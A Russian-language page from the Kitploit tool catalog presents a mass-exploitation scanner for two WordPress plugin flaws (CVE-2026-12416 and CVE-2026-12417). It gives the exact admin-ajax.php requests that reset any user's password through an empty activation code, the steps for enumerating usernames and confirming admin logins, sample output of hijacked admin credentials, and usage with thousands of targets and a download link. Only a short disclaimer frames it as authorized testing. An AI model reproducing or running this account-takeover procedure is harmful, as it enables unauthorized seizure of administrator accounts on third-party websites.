Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-12416-CVE-2026-12417 — Неаутентифицированный захват учетной записи через слабую проверку сброса пароля с параметром 'reset_user_id' | Неаутентифицированное повышение привилегий через слабую проверку сброса пароля с параметром 'reset_activation_code', ведущее к захвату учетной записи | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2026-12416-cve-2026-12417
Сканеры уязвимостейАтаки на ПаролиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификация
GitHubnxploited/cve-2026-12416-cve-2026-12417

CVE-2026-12416-CVE-2026-12417

Неаутентифицированный захват учетной записи через слабую проверку сброса пароля с параметром 'reset_user_id' | Неаутентифицированное повышение привилегий через слабую проверку сброса пароля с параметром 'reset_activation_code', ведущее к захвату учетной записи

Репозиторий
242 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-12416-CVE-2026-12417

Неаутентифицированный захват учётной записи через слабую проверку сброса пароля с помощью параметра 'reset_user_id' | Неаутентифицированное повышение привилегий через слабую проверку сброса пароля с помощью 'reset_activation_code', ведущее к захвату учётной записи

CVE-2026-12417 & CVE-2026-12416 — Массовый сканер

Автор: Khaled Alenazi (Nxploited)


Уязвимости

CVE-2026-12417 — SignUp & SignIn ≤ 1.0.0

Неаутентифицированное повышение привилегий через слабую проверку сброса пароля

ПолеЗначение
CVSS9.8 Критический
ВекторAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Опубликовано23 июня 2026
ИсследовательAlyudin Nafiie

Функция pravel_change_password() зарегистрирована как обработчик wp_ajax_nopriv — доступна без аутентификации. Она не выполняет проверку nonce и не проверяет права доступа. Единственной защитой является нестрогое сравнение на равенство между предоставленным атакующим reset_activation_code и значением мета-поля пользователя forgot_email. Для любого пользователя, который никогда не инициировал сброс пароля, get_user_meta() возвращает пустую строку, что тривиально удовлетворяет условию '' == '' при отсутствующем или пустом коде. Таким образом, неаутентифицированный атакующий может отправить поддельный POST-запрос на admin-ajax.php с параметрами action=pravel_change_password, reset_user_id, установленным на любой ID пользователя (включая учётные записи администраторов), и new_password_custom, установленным на произвольный пароль — что приводит к полному захвату учётной записи.


CVE-2026-12416 — Invoice Generator ≤ 1.0.0

Неаутентифицированный захват учётной записи через слабую проверку сброса пароля

ПолеЗначение
CVSS9.8 Критический
ВекторAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Опубликовано23 июня 2026
ИсследовательAlyudin Nafiie

Функция pravel_invoice_change_password() аналогично доступна как nopriv-обработчик AJAX без nonce и без проверки авторизации. Тот же обход '' == '' применим: передача пустого reset_activation_code для администратора, который никогда не использовал процедуру восстановления пароля, позволяет немедленно сбросить пароль. Атакующий управляет целью через reset_user_id и новыми учётными данными через new_password_custom.


Как работает сканер

root@kitploit:~
Для каждого целевого сайта:

  1. AJAX-зонд (быстрый путь — ID 1 и 2)
     POST /wp-admin/admin-ajax.php
       action=pravel_change_password        (CVE-2026-12417)
       action=pravel_invoice_change_password (CVE-2026-12416)
       reset_user_id=<id>
       new_password_custom=<fixed_password>
       reset_activation_code=              ← пусто — обходит проверку

     Ответ при успехе:
       {"activation":true,"message":"Password has been changed successfully"}

  2. Определение имени пользователя (лениво — выполняется только после подтверждённого сброса)
     a. GET /wp-json/wp/v2/users/<id>     ← точное имя пользователя для ID сброса
     b. "admin"                            ← всегда пробуется вторым
     c. GET /wp-json/wp/v2/users          ← массовый список REST API
     d. /?author=1..3 redirect            ← сканирование архива авторов

  3. Проверка входа
     POST /wp-login.php
       log=<username>  pwd=<password>
     Проверка на наличие cookie wordpress_logged_in.

  4. Подтверждение администратора
     GET /wp-admin/users.php
     Требуется возможность list_users — только для администраторов.
     Любое сообщение об отказе или перенаправление на вход → не администратор, пропуск.

  5. При подтверждении администратора
     Сохранение в scan_results/pravel_admin_success.txt:
       SITE | LOGIN URL | user | pass | exploit | id
     Вывод строки результата в терминал.

  6. Расширенный обход (если ID 1 и 2 не сработали)
     Повтор шагов 1–5 для ID пользователей с 3 по 20.

Успешный вывод

Терминал:

root@kitploit:~
  [1/5000]  https://target.com          NO
  [2/5000]  https://victim.com          ADMIN=admin  pass=Nxploited@123KSa  exploit=pravel_change_password id=1 | https://victim.com/wp-login.php
  [3/5000]  https://another.com         NO

Файл результатов (scan_results/pravel_admin_success.txt):

root@kitploit:~
[2026-06-24 16:00:00] SITE=https://victim.com | LOGIN=https://victim.com/wp-login.php | user=admin | pass=Nxploited@123KSa | exploit=pravel_change_password | id=1

Использование

root@kitploit:~
python Cl.py

  Targets file (one URL per line) [targets.txt]: sites.txt
  Threads (concurrent sites) [50]: 100

Требования:

root@kitploit:~
pip install requests rich colorama urllib3

Отказ от ответственности

Этот инструмент предназначен только для авторизованных исследований безопасности и тестирования на проникновение.
Использование против систем, которыми вы не владеете или на тестирование которых не имеете явного письменного разрешения, незаконно.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.
Все сведения о CVE взяты из общедоступных баз данных уязвимостей.


Автор: Khaled Alenazi (Nxploited)

Скачать инструмент